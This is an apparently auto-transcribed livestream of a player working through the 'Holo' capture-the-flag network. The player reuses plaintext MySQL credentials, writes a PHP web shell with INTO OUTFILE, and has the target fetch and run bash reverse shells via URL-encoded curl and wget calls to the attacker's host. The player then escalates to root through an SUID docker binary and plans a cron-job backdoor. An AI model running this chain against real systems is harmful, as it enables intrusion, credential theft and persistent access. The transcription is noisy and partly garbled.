looking back at what is this, Holo live here. So let's go ahead and hop back into this guy first. Let's make sure he's up and running first. How about that? And yeah, it looks like he is. Okay, so network uptime's been 5 hours 44 minutes. Let's go ahead and hop back into this guy. Use exploit multi-handlers. We haven't touched him in like a minute. So show options. I think our L port was 4242 if I remember correctly. We can go ahead and check our notes also and see what we have with that reverse shell. Did we have 4242? Yeah, we did. Okay, cool. And let's go ahead and hop back over into that that site that we were at, right? There we go. Or if we can just hit enter, and that will just work for us. Oh, maybe I should do a run, huh? Whoops. No, we'll see if that'll work for us. Okay, let's make sure that's still the IP address also. Stop, back. Let's go to admin. Let's get back to Holo Live, see if that works. Okay, so right now it doesn't look like we're actually on the machine, maybe? It's saying that it's up and running, but we have to like extend it. Refresh this page, maybe? Refresh that page probably, huh? It's probably just, I noticed that, I think it was just frozen. We might have to start this machine back up again. Yeah, we do. Okay, start. There we go. Okay, cool. Now he's starting. And that process may take up to 5 minutes. Let's go ahead and we're just going to keep trying to get on him. And hopefully the IP address stays the same, huh? Guess we'll find out, won't we? It should. Yeah, it should stay the same. IP address there. But IP address should stay the same. Let's go ahead and cat or sudo, yeah, we just cat etc host. Alright, 10.200, 108.33. Let's go ahead and ping 10.200.108.33, and we'll just wait for this guy. Okay, so we are getting a reply here. So we're getting some replies back over here. Just grab my phone here, see if anyone's texting anything right there. That we're getting some reply stuff. So let's go ahead and try again. See if we get a call back over here. Now we're just waiting for this guy to actually start up, huh? Well, first off, HTTP, not HTTPS. Okay, let's go ahead and type in admin, and the other one was nmap cat db manager login. We did get through all this earlier on stream also, so if you didn't see that stream, this may be a little bit confusing to you like right now how we know all this stuff, but that's because we were on earlier on stream, we were able to get to all of it. There we go, we get to our command session shell 1 open. We are www data, and let's go ahead and search for shell 2. Grab that shell interpreter again, right? Use 0, show options, set our session to 1, and let's go ahead and run that. And this is like where we were earlier, right? So this is how far we were earlier. Now, like I said, this is a real machine, right? Real machine. So I think let's go into sessions 2, and I'm thinking we may not have to actually. Let's go ahead and cat dashboard.php. I'm thinking that we may be able to, because we already got into the SQL server, right? MySQL. We tried to figure out root. It was a nice recap. I got it. Hey, thanks. Real good recap. Just say we did this and that. We already got into root, right? We already got into the MySQL server. We have an admin password. We figured out a whole bunch of problems between admin and dev, and we found local file inclusion. And we were never able to get root on this machine, right? Like right here. And then as I sat there and thought about it, like really, do we need to get root on this machine? Because right now, because we know that we're in a Docker on it, right? But as I started reading the objectives over here, I realized we may not have to break out of a Docker off of this guy, right? It just says living off the land and going on to the next machine. So if it's expecting us to do that, I was like, okay, how are we supposed to get into the next machine, right? How are we supposed to know what the next machine has and everything like that? And then I started to kind of, you know, think around that kind of idea of, do we have to actually get anywhere? So let's just start looking at some different things on here and see if we can find something. Maybe DB Connect, because a database server is a database server, right? Everything that runs off of that database is coming back to that server. That's kind of how I'm looking at this like right now. So let's go ahead and cat DB Connect, and as soon as I say that, obviously there we go. Okay, so we have 192.168.100.1, so we know that's somebody now. Let's go ahead and we'll get on the shell. We'll do an NC TAC. Oh God, I think it's actually in here. ZV? Yeah, NCZV. So what does the Z stand for MMAP? MMAP. Or NC. NC. TAC help. Because you can have it do, what it's going to do is going to go around the ports, but the Z just pings 0 to IO mode. Used for scanning. Okay, so Z, then V should be for verbose. So we can do from this machine like right here, right? So if I do ifconfig from 192.168.100.100, who we can look at right here and see 100.100, we can actually get to 100.1, right? Especially if I do like an aircrack-ng or something like that, we see 100.1 also exists. So let's go ahead and grab this stuff like right here, because this information is for 100.1. And okay, this is also running as admin. Now, if we're running as admin, something else we should also be able to do is create a reverse shell if we can get into the MySQL. That's why when I very first found out that we could get into MySQL that's why I very first tried it earlier today. Whenever I saw that, that MySQL was actually a thing on the server, right, on the mmap scan, when we saw it 33060, that's why I was trying to get into it using the host command. So let's go ahead and do a off this web page. Well, now we have. Let's go ahead and do what is this guy's name even? Let's go ahead and do a host name. Okay, shell host name. This host name is 56C whatever. So I guess we can just say web server, huh? So web server. And then from here we'll say DB Connect. PHP, and we have some plain text credentials in there for 192.168.100.1. Alright, so let's go ahead and start to work on that guy like right there, that 192.168.100.1. That doesn't matter. So let's try to do first off, let's try to ping 192.168.100.1. Ping is not known, okay, so he's not able to ping, okay. Let's try to do a netcat, netcat at him. So shell nc tac zv, right? The Z is for IO mode used for scanning. Tac zv for 192.168.100.1, and I believe we want to do, it says like ports of that, right? Yeah, 1 through 65,535. So 1 through 65535. Right, that's how many ports there are, right? So 33060 is open, 8080 is open, 3306 is open. So this is most likely also something to do with MySQL. 8080 is open. We have port 80, port 22. And we have this nice little, this guy right here. So 192.168.100.1 has a bunch of stuff open in it so far, right? So let's go ahead and do this like right here. Just say finding open ports in 100.1. Web server 192.168.100.1. From the web server, we are able to scan the 192.168.100.1 network. Now, remember, this is without proxy chains running, just so you know. Okay. So it looks like we have SSH. We have 3306, right? So if we can do something with that 3306, we might be able to get this guy, or 33060. Let's go ahead and do a cat scripts full shell, and let's go ahead and grab that Python 3. Now let's see if that actually works. That 192.168.100.1. Yeah, I want to see if this actually works, like right here. So let's do a MySQL. Attack U admin, I believe it was. Is that correct? Admin. There is attack P. Attack H 192.168.100.1. So there is a password, right? So we just do attack P. So it asks for a password. There's our password, supposedly. So that does work. Okay. So let's go ahead and show that that does work, like right there. So we go ahead and grab him. Boom. Alright. I think we can also see who we're running it as, too. Then we can say from web server was able to log in through MySQL to 192.168.100.1. Whoops. There we go. Alright, cool. So now, let's go ahead and do a show databases. We have dashboard database, which is different. Let's go ahead and use that guy. Show tables. Whoops. No. Yeah, whatever. It's not good. Okay, show tables. And we have users, select star from users. And we have DB manager login, which we already knew that. And then we have just Gurag with all A's. Can we do an SSH into him through that? I wonder what that is all about. Like right there, like Gurag, that's just 4 A's. Okay. Okay, so I wonder what that's all about. Can we SSH in that guy? This guy doesn't have SSH on him, I don't think. Okay. So we did that. What's the default gateway for the Docker container? 192.168.100.1. What's the high web port in the container? 3306. Is that what it's asking me? Oh, 8080. Is that what it's asking me? And then what was the low one? What was it? 3306. Okay. Situational awareness. So, what is the server address of the remote database? I believe it's 192.168.100.1. What is the password of the remote database? We have that. I should probably actually save that password. I should probably save that password, huh? So we should do a, let me see here, nano 192.168.100.1 db user pass dot text. We'll do admin, and then we'll say it's this. There we go. So let's throw that into here. What is the username? Admin. What is the database name of the remote database? And we did have that actually. We saw that. That was dashboard DB. What username can be found within the database itself? That G1, right? Pretty sure that's what it's talking about right there. Gurag. Okay, make it thin, Lizzie proud. So I think, actually, that actually kind of looks like what we're going to do. Yeah, it does, okay. We can use a single command to inject PHP code into a table. So, I think I already have that though. Cat scripts PHP command execution address bar. Is that what it is? That's with the curl, okay. Let's put it there. That one, like right there, we're going to do. No. Okay, let's go ahead and this one. Look at it, allow us to put. Okay, let's put. Yeah, that's to be able to put something. Command. Is that it? System. No, it's the get command. Okay, so we're gonna make a new one. We're saying nano, PHP or nano scripts PHP. I don't know why it keeps going like that. PHP. Insert command into MySQL.txt. Let's go ahead and copy this. Okay, so this methodology for exploiting MySQL can be found below. Access the remote database using administrator credentials, which we did. Create a new table in the main database. Inject PHP code to gain command execution. Boom. Drop table contents onto a file that the user can access. SQ and obtain RCE on the host. Let's go ahead and copy all that, right? We're going to throw that in here first. That should be the very first thing that we do, okay? Actually, you know what? Let's do Sublime Text. Scripts, PHP, since we just did this one yesterday, right? And it was Alt-Shift. Whoopsie daisy. Boom. Okay. There we go. Okay. And then we can go ahead and start to get this guy right here. So first thing we want to do is we want to create a table, right? So that's going to be the very first thing we have to do is to create a table. So that's just literally just going to be create table, table name, and then variable characters, right? So we should actually be able to look this up. So how to create table in MySQL. Create table, if not exist. Table count, we don't need any of that crap either. Okay, there we go. We need just something like that, okay? But we need more variable characters, right? A lot more. Okay, so we're just going to do that. Okay, we're going to do create table, whatever the table name is, and then ours is actually going to be like the variable characters like 255, because we want a lot more characters, right? We don't want just 20 characters, so it would be var character 255. So let's go ahead and do a create table, and we'll say pond, and then we'll say there should be something like variable. Is it create table pond? That alter table. No. Variable character. Is a variable character right after that, or is variable character come way later on? I don't remember. Variable characters right after that. So, or if it's way later on, if it's like the next one after that one. I believe it should be pond var character 255, like that. I think it goes like that. Okay, cool. So now if I do show tables, we should have a new table called pond. Okay, we do. Alright, now what we need to do is, I believe we need to actually put, like we have to insert the command into that table. Alright. So we got to insert our PHP command into there, right? So we're going to insert into pond. Pond, I think like that, right? And that's going to be a, what is it? So pond, then we're going to do a value for our reverse shell. Values, is it values equal? Does this guy have it all? No, he does not. Okay, so we're going to enter into value. We can use a single command to enter our PHP code into a table and save it. Into out file, yeah. Let's just save it into the out file. Can we just do that and then just kind of go to it? We could, then we could get it with curl, couldn't we? Let's just try, but don't we have to have, can we just throw this on there? Like for real? No? Let's try it. Let's try to just throw that on there. Like, do we need all this other crap here? Because if I cat my PHP insert command into MySQL, we have to get inject PHP code to gain command execution. Create a new table in the main database. We just did that, right? Inject PHP code to, yeah. So that would be injecting PHP code, right? Oh wait, no, we don't want it in shell.php because we already have that, don't we? Let's go ahead and call it rev.php. because we made that shell.php earlier, huh? Okay, so now we should have a rev.php, right? That's what I'm seeing like right now. Okay. Now from here, drop table contents into a file the user can access, execute, obtain, remote code execution on host. So the user can access that. And now from here, if I do a curl, right? So this one's going to 8080, but if I do a curl, maybe actually over here, I'm going to go ahead and go to exit, curl 192.168.100.1, and this one's saying 8080 slash rev.php question mark command equals ID, because we got rev, right? And that did work. It looks like it, at least. Let's try that again. Let's try to do, because we're still www data, I don't know if that's what I'm actually supposed to be over there. But he is going to 8080 on 192.168.100. So that seemed like it worked. So let's go ahead and grab all this and throw it into here. So let's go ahead and get my Sublime text opened up again. Boom, boom. Okay. And we're just going to put all this right over in here. I'm just going to kind of copy and paste. There's all that. Select star from users. Create table. Pond. Like that. Okay. Example. Just so we'll see that I created a table now. I'll go ahead and throw this guy in there. There we go. Okay. So that's just telling me the same exact thing I just typed in. And then we'll exit. And we'll try something like that. Okay. Cool. So now let's go ahead and try this curl command again. Except for this time we're going to try and make a reverse shell. Equals, can we do a netcat-e in this guy? And just make a reverse shell like straight up. Let's go ahead and background this channel. Background this guy. Use exploit multi-handler. Set lhost to my 10, right? Set lport to, let's say, 1111. Run tac J. We're already on generic shell reverse TCP, so we can go ahead and use that for this, right? There's that. Okay, so it's 1111. Let's go ahead and sessions tac I. See where we're at. Sessions 2 shell. All right. Get that Python again. Scripts, full shell. If anyone has any questions on what we just did, like right there, I'm more than happy to answer them. Alright, there we go, full shell. Now we got our admin, right? Let's go ahead and do a little, that curl again. Curl for 192.168.100.1 8080 slash rev.php, or 8080 question mark command slash rev.php question mark command equals ID again. Make sure it still works. Okay, it does. Cool. Now let's go ahead and do a command equals cat scripts netcat reverse shell again. Let's go ahead and try netcat-e again. And we'll do it with my IP address, right? I have config. Let's go and grab my IP. And that's going to be for port 1. If this does work, fail to connect. Port 80 connection refused. What? I didn't ask for port 80. Okay. I wonder if I should have put that in quotes. Huh. Probably should put that as quotes, huh? Probably sent a bad request that could not be understood. That's crappy, now isn't it? Okay. Alright, it's really crappy, now isn't it? .480 address. I don't know what it keeps trying to do there. Curl 192.168.100.1 8080 rev.php command equals pwd. Okay. And I'm in /admin, so we know that we're actually in this. Right, so good, okay. So let's go ahead and do that again with like an ls-tac LA, see what's in there, huh? There's our shell.php. We also have talents.php. How is shell.php in there actually, now I think about it? Or does somebody else do that and we're just late to the party? Probably late to the party, huh? It's really weird. I wonder if I need to do like the %20 if I'm going to do like a space. Oh, okay, we got somewhere. %20 for space, so that means we're going to have to frickin' URL encode all this when using curl, huh? That's going to be a little bit annoying, but we can just do it with within Burst Suite, like real quick, you know. Let's copy and paste. So let's try to get a netcat reverse shell again going. That's URL encoded. So let's go ahead and go. Let's just try a URL encode. Change the English URL encoder. Here we go. Okay, cool. So let's go ahead and put something into our URL encoder and see if it works. Let's see if NC-TAC-E works, because the other one had NC-TAC-E, so that's all I'm wondering. Encode. Thank you. And let's try to grab that and throw it into here. Question mark command equals. Let's try that. Remember, we do have that one running in the background, right? So if I were to do a NC-TAC LVMP 111, we can see I'm not allowed to do that because I already have something running in the background, right? Let me go ahead and copy this whole thing. Control C, yes. Control Z, yes. Session check I did have that one running in the background, but looks like we did not get any type of call back, right? Let's go ahead and kill that one that's running in the background. We'll try netcat down here. Let's see if we can do something with that, huh? Sessions 2, shell. Just kind of want to get this again, but let's go ahead and grab a cat scripts full shell again. What we got here? Okay, there's that. And let's go ahead and grab that URL encoding guy like right here. We're not getting anything back. Okay. Nothing coming back down here, right? So now we got to try to figure out, okay, what can we use to actually make a callback to us, which may not be the simplest thing. Actually, it may be. Can we just put up... Okay, a couple things. Can we try to do a wget? There's one. Can we try to do a... Yeah, can we do like a wget or something like that and put an elf file out of there? Or like a bash file or something like that? Let's see if we can do a wget. rev.php question mark command equals wget. Can I do that? Well, it doesn't say no wget, I'll tell you that much. Okay, so let's try wget. So let's just try to do something easy first. Let's go ahead and try, do I have something in here for like test.sh? Yeah. Python 3 tech HTTP server 80. Let's do a curl .8080 rev.php question mark command equals wget %20. Actually, we might actually want to do it over here, huh? We're going to do wget HTTP my IP address. Can I even do that as the next question? And if I can't, then I can always upload it into this guy right here, huh? So let's go ahead and grab my IP address, test.sh, and code that. Thank you. It got it. We got 200 over here. So it can talk to me. Okay, cool. Now can we run that? Can we do a bash? Can we do a curl blah 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 blah, right? Like we do a bash %20 test.sh, and it says hello. Alright, so that will run. We know that, right? Cool. Let's go ahead and get a... Let's go ahead and copy this stuff part again. 1111, okay. X out of there, Control Z out of here, yes. Okay, Control Z, yes. Show options. We just have a regular generic reverse shell. Let's go ahead and run him. Or can we do an elf file? Should we do an elf file? Let's try an elf file. Something fun, right? Well, I can't do a bash on elf file, can I? No, I can't. I might have to do like a period slash on that file, huh? So let's just do regular. Let's just try to stick to something easy here and just do like a regular bash reverse shell or something like that. So let's go ahead and run tech-j, run it in the background, right? Let's go ahead and cat a bash reverse shell. Go ahead and grab that guy right here. We'll throw him over here. We'll put my IP address in him, right? For 1111. And we'll save him. We'll output him. I'll put him into a bash.sh, cat bash.sh, change mode 777 for bash.sh, and let's go ahead and actually period slash bash.sh and see if this will actually run over here. Syntax bad, FD number. What? Really? Do I have to get rid of that guy? Directory non-existent. What? Okay, let's try the... Why isn't that one working for us? Let's try the reverse shell one then. Or let's try on netcat then. Let's go ahead and do a netcat reverse shell and try this one right here. Let's try him. Okay. So there's always more than one way, right? And that's actually going to be for 1111. This is going to be for the IP address of this thing right here. Okay, so let's go ahead and let's try to run him. There we go. Okay, so we got a command shell, so that's 3 open. So let's go ahead and sessions tac 3, exit, Control C, yes, tear down that one, right? And let's go ahead and run that again in the background. And let's try to send up this bash. He is in the same folder, right, as Holo. Okay, cool. So let's try to send up this bash now. Let's go ahead and do a sessions tac I. So we know that will work. Sessions 2, shell. Throw in the cat in the script full shell. Python 3. Curl HTTP 192.168.100.1 8080 / rev.php !command equals wget %20. We're going to have to actually put it back over here again, aren't we? And that was called bash now, right? Bash did sh. Let's go ahead and code him. Okay, we got that encoding like right there. And let's go ahead and throw that over into here and see if we get 200, and we do. Okay, so he grabbed him. Alright, so let's go ahead and do this again. And this time we're going to run bash %20, right? That's space bash bash.sh. And we do have a command shell, session 4 open now. So let's go ahead and Control Z, yes, and see like what that's for actually. Session tac I. That's not really what I want, now was it? What the fuck is that? Go to sessions 4. I want to see something. Let's say that there's this guy up here. Why are you in this damn guy? Where am I on this thing? Where am I? Okay, what's happening here? Where am I? Okay. Okay. We have a different host name. So that's good. We also have a different IP address too. Okay, so we're in 100.1 now. Okay, cool. So that did work, like right there. So let's take a print screen of that guy. So let's first cat our bash.sh. Okay. So we're just going to say reverse shell. So we're going to come back over into my, this guy right here. Then we're going to say reverse shell. Reverse shell to 192.168.100.1. Okay. That's what it's going to look like right there. Let's go ahead and copy this whole thing down. Bam. Whoopsie daisy. We'll say your here. Your IP address here. They'll say your port here. Okay. Then from here we went ahead and we had a this guy opened up, right? Multi-handler ready to go. Whoopsie daisy. If we just pressed insert. We had a multi-handler up and ready to go, right? I'm not going to show that we tested it 150 times, but I'm going to show that we do have a multi-handler up and running. Right here. God damn, I keep hitting Control-Shift-Delete for some reason. I don't know why I keep hitting that, but I do. Alright, so we're at least getting somewhere now. We're in another box now. Just looks like it's the exact same thing. So that's running in the background. Exploit running as background job 2. There. We'll say that, just so there's no confusion. We ran that in the background, right? And then from here, we did a Scroll down like a little bit. We then did a curl command to do a wget. As shown below, we are URL encoding the curl commands. Okay, we're doing that. So let me go ahead and just copy and paste that guy in case he does use the same exact IP address as me, or however he does it. Or if he just wants to just change his IP address in there. Right here we can actually put down your IP address. Goes here. Okay. And then we'll do, there's that, and then we have this one right here, right? And that's like us actually running that bash command, thus opening up a command shell and everything like that, right? So let's go ahead and copy and paste what I did like right there. Alright, cool. I should actually say curl, there we go. And then we get our nice little command shell session 4 opened up. We get that. And from here we get this guy like right here. And now we're in a Docker hell, it looks like, because of we got a bunch of IP addresses in there. So now it looks like we're just in a Docker hell. But we are getting somewhere, which is better than where we were an hour ago. So LSAC LA. Let's go ahead and cat that about.php. Because that's MySQL. What the heck is this? What do you do? By Twitter integration, huh? We found any more default credentials? I did that. There's image.php index. That's ours. SAS, shell, talents. Default themes. Okay, so a lot of stuff doesn't look like worries me too much. Let's go ahead and cd into home. And we can see, yeah, we're 100% in a Docker. cd in Docker. Can I do that? Okay, cat user.text. Can I do that? Ho ho, hey yo, we're getting somewhere. And we do have a WordPress also, looks like in this Docker too. Or also, however you want to look at, however you want to say that. Okay, okay. Let's go ahead. What user is the database running as? www data. Okay. We knew that because we did our ID and we saw www data, right? So let's go ahead and grab this guy right here, and we'll go ahead and we will throw him into our flag submission, and that's that one, right? Isn't that L server 1? Is that what we're on like right now? 192.168.100.1, right? What are we on like right now? Because they're not really good names. Because if I do host name, I'm on that. So it's not really a good name. And I can cat user.text. So why can't I... Where's this guy supposed to go then? Why is he... Oh, I already found him? But I've never gotten this far, I don't think. I didn't think I did. Whatever. Whatevs. Alright, so we got Docker file, WebTar, WordPress, DB script. There's that again. We've seen this one before. We got admin. Let's see the admin. We've seen all this stuff before, right? Yep. CD back. So we've seen all of this before. There's our WordPress. What is our views? Yeah, that was the count, right? So we gotta be looking at something that has to do with like SUID bits, something like that. So let's do a script, SUID lookup. We gotta be looking for something that has to do with SUID bits or something like that. Because we've already seen all of this stuff here before. Okay, so that doesn't want to show us anything. Do we have a which Python? Or did I just break the damn box? I broke the freaking box, didn't I? Go ahead and run him again in the background. And we will do a sessions 2. Whoops, sessions 2. I'm going to try to get an interpreter session with that guy also, so I can't do that to him anymore. And we'll do a, no, not that. Damn, I'll break you too. Alright. Grab that. Okay, there we go. Curl HTTP 192.168.100.1 8080 rev.php question mark command equals curl, no, command equals bash /920 bash.sh. Is that what it was? There we go. Command shell session 5 is opened up. Background him, sessions, or actually let's do a search for shell 2. Use 0, show options, set session to 5, set our L port to 1112, and we'll go ahead and run that. Let's see if that works. Looking good. Magnificent. Oh, that looks good. There we go. Okay, cool. So now let's just go ahead into session 6. Much nicer. Cool. Okay. Now let's go ahead and get back into there. Which Python? Good. That's what I see. Which Python 3? Alright, that's what I see it right there. There we go. And let's go ahead and try to do that SUID bit again. Cat scripts. SUID look up that text. And let's go ahead and throw this guy in there again. And hopefully it doesn't break it this time. And we do have a user bin Docker. Okay? Good. Just as I thought. So we had this from last time, right? We were looking at this guy from last time, right? Trying to run this, but there was no Docker, correct? Let's try it this time. cd and / user bin. And let's go ahead and try to run him. I think I broke him. Oh, I didn't break him. Okay. Alright, so I didn't break him, but he isn't root. Wasn't really exactly what I wanted, but at least we did not break him, right? So which Docker? I should look that up first, huh? Okay, that was very helpful. So we do have the SUID but for Docker, but it doesn't look like we do too much with that. Shell can be used to break out restricted environments responding to interactive shell. The resulting is a root shell. That'll be sweet. Let's try that. I mean, I'll take it. But it's still running that Alpine thing like right there, and I don't know. I guess I could always try a which Alpine and go to that directory. I don't know how to. I'm not really good with that. Damn, I was really hoping to say roots like right there, but it doesn't. Alright, let's continue with this and start to think of other ways to be able to do this, because right now we're stuck in Docker hell, right? So can I just get rid of Alpine? Can we just not have Alpine in there? So if we go back to here, run the Docker with just chroot. Maybe there's just no Alpine. Mwahaha. Let's see. -h. Can I just get rid of Alpine? Can I just get rid of chroot? Can I get rid of everything that's not the latest and greatest thing? Can I just get rid of it? Maybe I can just get rid of chroot. I don't know, man. I think I need more information. Okay. Docker SUID bit set how to. I don't think it's going to be as easy as just Alpine. You know what I'm saying? If we had Alpine in here, it would be that easy, but I don't think it's going to be that easy right now. Do we have anything running as cat xp cron? No. Crap. Okay, I was really hoping we had a cron job running, make my life a little bit easier, but I think it has to do with that Docker, like right there. If we're going to break out that Docker, I feel like it has to do with that Docker. Do we have anything that this guy actually tells us? How about that? Instead of me, because I always do that. Going out with a shebang. Oh. Did we already do this? Oh, we already did that. Yay, we did it. Obtain a shell. Yeah, we did that. Call me Mario. Okay. What we got here? Yeah, okay, so we're looking at that. LMPs, we found user bin Docker. What is the first full line of the exploit for the SUID bin? That's what I'm trying to figure out. This thing knows I'm trying to figure that out. He knows. What is it talking about this, like right here? I don't know what it's talking about actually. What do you mean the first full line? I feel like an idiot. Okay. Escalate privileges submit root flag to task 4. So I'm trying to do. What is the hint? GTFO bins. The hint was horrible. Alright. So, what is happening with this Docker? Because we just can't run in Alpine, whatever else, right? I feel like there's more to it than just that. Okay. Docker name is not reviewed. How can I set the SUID bit for Docker file? Docker GTFO bins. If we know how to do Dockers, breaking out of them, setting up on Docker. I feel like we have to have the operating system on there somewhere. I feel like it's not just moving SUID to binaries, use SUID containers, not start as root. Like Alpine's just the most famous one, but I feel like we don't need to. It doesn't need to be Alpine, right? So what I think the problem, like right now, is that we need to have it running like whatever we're running, right? Like whatever we want to run. So instead of Alpine, it should be. It's not running Alpine. It's just running Docker on itself. So it should be uname tac a. We have Ubuntu, right? Which version? We can probably get that with a quick little wget http. Do I still have a Python thing going? No, I do not. Let's just go down here real quick. Python 3 is server, and we should have a limpy's in here, right? Yep, limpy's still in there. And my PA address was. I'm just gonna look that up real quick. Config. Ooh, scrolling up slowly. There we go. /linps.sh, right? Permission denied. Oh, CD into temp. Let's try that again. Whoopsie. And we get 200 over there, and we get it back over here. Stack LA. Cat that, or cat. Yeah, okay. Period / change mode. 777 to limps.sh. Period / limps.sh. See if this works. If it does, then we'll go ahead and we'll show how we got on this machine. Yes, Docker, running Docker containers, okay. But we want to figure out what the hell Linux version, Ubuntu 20.04. That's what we're running like right now. Is Ubuntu 20.04, right? So if we're running 20.04, I feel like we need to do Ubuntu 20.04 chroot into this machine here. We could have also just uploaded it with whatever the hell it's called. What the hell is 34405? What are you? Why are you listening so hardcore, so intently on that? Well, I want to take a look at that, huh? Oh, that's Docker's actually talking back and forth. Docker. Alright, so it is definitely Docker. Let's go ahead, yes. Shell. Go ahead and cat some SUID bits again. Cat. Whoa. Cat. Script full shell again. We've got a Python 3 guy over here. And cd/user bin. We do have that Docker still in there, so I think it's going to be a Docker, /Docker. Right? /Docker. And then from here, we're going to put the rest of this stuff in, but right where it says Alpine, so /Docker, right where it says Alpine, so it says Alpine right here. I think we are going to do Ubuntu 20.04. And then chroot, right? And then the rest of it. So I feel like it should be something like that. Because it was Ubuntu 20.04. Let's go ahead and try this, like right here, because it's looking for Alpine, but Alpine doesn't actually exist. So it's running. Let's try to do that. Or it might be 18.04, but the thing definitely said 20.04, right? It's unable to find Ubuntu 20.04 locally. Is it 18? I mean, the linpiece definitely said 20.04, right? Let's see something real quick. Now check your version of Ubuntu in the terminal. LSB release displays LSB links that have base information about the. Okay, so LSB release TAC A. Let's try that. Maybe it's 18.04, even though the other one's saying 20.04. I'm wondering if it can't tell. Let's try it. I feel like this is the command that's running though, so I feel like it knows what to do. 20.04, 0.1. Yeah, so it should be Ubuntu 20.04. Maybe we need that 0.1. What? Is a Docker running as something different? Can a Docker run as something different? Can a Docker run as something different? How? The 20.04 now or 18.04 works. How's the Docker? Is the Docker running? It has something different? See, that's also the freaking wild guess of. There's no reason for me to. How? I was going to start just working my way back. I think the host is on 20.04, but is the Docker on 18.04? If so, how the hell do we even know that except for just wild guesses like that? Can we actually like look at the Docker? Okay. I'm gonna have to let me exit out of that. Okay. So like a docker.conf file or something. Is there a way for us to be able to get more information on this thing? So then next time I do this, it's not just a wild freaking guess. Docker D? What's that? Can we cat that? We can read it. Cat Docker D. What's Docker D doing? Okay, that's excellent. Okay. We're going to be here a minute too. That's even better. Control C. Yes. Just exit out of there. Just terminate that. Okay. Shell. All right, grab this guy again. See Docker version. Let's do that. How to see Docker version on Ubuntu terminal. Let's try that. Show the Docker version. Ooh, Docker-tag version. Okay, let's do that. Docker-tag version, huh? Command not found. Okay, CD in the user bin. Let's try that again. Docker-tag version. That's good. That command is 100% not realistic. Okay, Docker version. So there's maybe I don't know why I had it like that. If it's like this, no. What the hell has happened? Okay, Docker version. That's not really telling us anything, now is it? Okay. Huh. So we're just taking a frickin' wild goose chase that's 18.04. So now we just gotta say, hey, trying different Docker versions, or trying different Ubuntu versions, we can come up with that it's 18.04. So now, how to find local image name? That's what I'm trying to figure out. So Alpine wasn't working, right? So I was like, okay, cool. Then it has to be Ubuntu because there's nothing in here that's in actual Docker itself, like Alpine. So then I tried 20.04 because that's what uname. Was it uname tag A that showed me that, or was it Limpy? One of them showed me that, right? That was 20.04. I was like, all right, cool, easy day. So I tried 20.04. That didn't work. So then I just started kind of working my way back. Because it was at least gave me a better thing that, hey, it just couldn't find Alpine. It was just saying like, hey, it's not 20.04. So if I do this one with 20.04, right, I'll show you. 20.04. I had a better output than just Alpine had, I believe, if I remember correctly. Alright. I didn't able to find image for that one, right? I believe it was the Alpine one. It was just saying like, hey, I'm unable to find. So I'm like, okay, well, let's try 18.04. Alright, because that's another image version of this thing, right? Or another type of Ubuntu thing, right? We do that, and all of a sudden we're root. That's what I'm trying to figure out, is how the hell do we see the actual Docker information there? And that's what I don't get, like how, like, instead of just wild guess, how do we actually do that? Thank you very much, Over Kiosk. Like, how do we get that? Because that's just a wild freaking guess, like, right there. We see that Docker can be run with an SUID bit. So let's go ahead and look up that. Let's go ahead and grab that SUID bit again. We grab that. We see Docker, right? Let's go ahead and highlight that. We can do that right there. Let's go ahead and grab the what we use for that, right? There we go. There we go. Okay, so then they copy paste, right? Now from here, we go to GTFO bins. Say this guy right here. Okay, the binary has to W and stress example local SUID copy the binary to be ran. We'll say okay, control V. Since Alpine was not on the system, we first tried Ubuntu 20.04 and 20.04.1. However, neither worked. So then we started to work our way back and saw that 18.04 gave us root. Okay, so let's go ahead and run that 18.04 one again, right? Which is this, like right here. I'm going to copy that back right here and copy him into there. And we'll go ahead and do this. And we type in ID, and we are now root. Cool. Now what we want to do is actually, let's go ahead and make a cd into /home, cd into Docker, so I was able to go in there, right? And let's go ahead and I kind of want to do a cron job that runs like every minute, and it sends a file back to me so that I have a way to be able to just get right back into this guy. Because there's still like how many days left with this thing, right? What my buddy's saying? Nothing, bro. Okay. Yeah, I want to kind of make a file. Alright, let's go into CD into root first. So I don't have to go through that whole thing again. Cat root.txt. You know what I'm saying? And I can just turn this on and just wait, and all of a sudden I'll be like right there again. You know? I think I'm going to do it. We're going to do it. We're 100% going to do it. Alright, so we got to root. And to not have to go through that whole thing again. How? What flag can be found to gain user? Are we already... What? Oh, CD back into home? Is there another CD into Ubuntu? Linux admin? Hold up. Hey. Alright, let's go ahead and try that real quick. Let's go ahead and grab this ID RSA key, because this will greatly decrease the amount of time we have to spend. Let's go ahead and nano SSH or ID RSA. Alright. And this is for Linux admin, right? So we should say Linux admin ID RSA. Okay, change mode 600. Linux admin ID RSA. SSH TAC I Linux admin ID RSA at 10 or 192.168.100.1, right? See if that works. Wait, do we even have a port 22? Maybe that's that 330, whatever it was. .100.1 on frickin' it's about 1,535. Do it on my damn self. It's saying that's all. Saying nothing allowed, huh? I gotta do it for somebody else. Okay, let's go ahead and terminate that channel. Yes. Control Z. Yes. Sessions tag I. Sessions 2. Shell, and we'll try it again. NC tech VV. Yeah. Okay, port 22 is open. Never mind. So is this guy going to work over here? Probably not, huh? And the other guy doesn't have SSH. Oh my god. So, okay, let's make the cron job. Let's make the cron job. Screw that. Let's go ahead and hop back over because I still have, as long as nobody resets it now, and we got 3 resets left, we still have 9 days of access left for this thing. So before it resets. So we should definitely be able to, we've got 9 days. Well, I don't know if we're ever going to get that though. But let's at least make a, yeah, because he doesn't want to do it that way, huh? I wonder if he has another IP address actually. He should. Does that work with that? I need my password. I don't have a password. Should be change mode 600, right? We don't have a password, dude. It's fucking an IDRSA key. That's okay. Okay. Because it's not freaking. Yeah, it's just the open SSH. That's dumb. Because it should have some type of it should say some type of passphrase on there. That's all. And it doesn't. It says password. So that does not work for that guy. Or else it would say passphrase. Okay. Control Z, yes. Show options. No, what? Session tag I, session 6. So we do know that cron jobs do exist, or that we can do a cron job because we did a cron tab, right? And so let's go ahead and look up a cron tab tag E. That is one of them. The cron tab command found in list. Boom, boom. Generally, cron tab is used to schedule commands. Okay, so we can do a cron tab tag E because this is one of the things I actually used for my own box whenever I did it. And I remember doing that with the for our box, but with the Raspberry Pi, I did cron tab tag E to be able to give it a new cron job. Okay. And of course, that's not going to run the way I want to. So let's do a, what is it, cron job? Is it cron job tag E? No, it's definitely. Okay, so we want to make cron job and Linux. Every 5 minutes. Yep. It's really going to be every 1 minute. Cron tab tag E command, see? No, I'm not going freaking insane. Edit your cron job by using cron tab tag E. No, I'm not going insane. So, shell. Let's go ahead and grab that full shell. Grab that guy, like right here. I'm going to throw him in there. Cron tab tag E. Right? And then we just hit enter, I think. No. Oh wait, I just gotta get to root again, right? So we gotta do that docker again, right? That's all. I took notes. Okay, 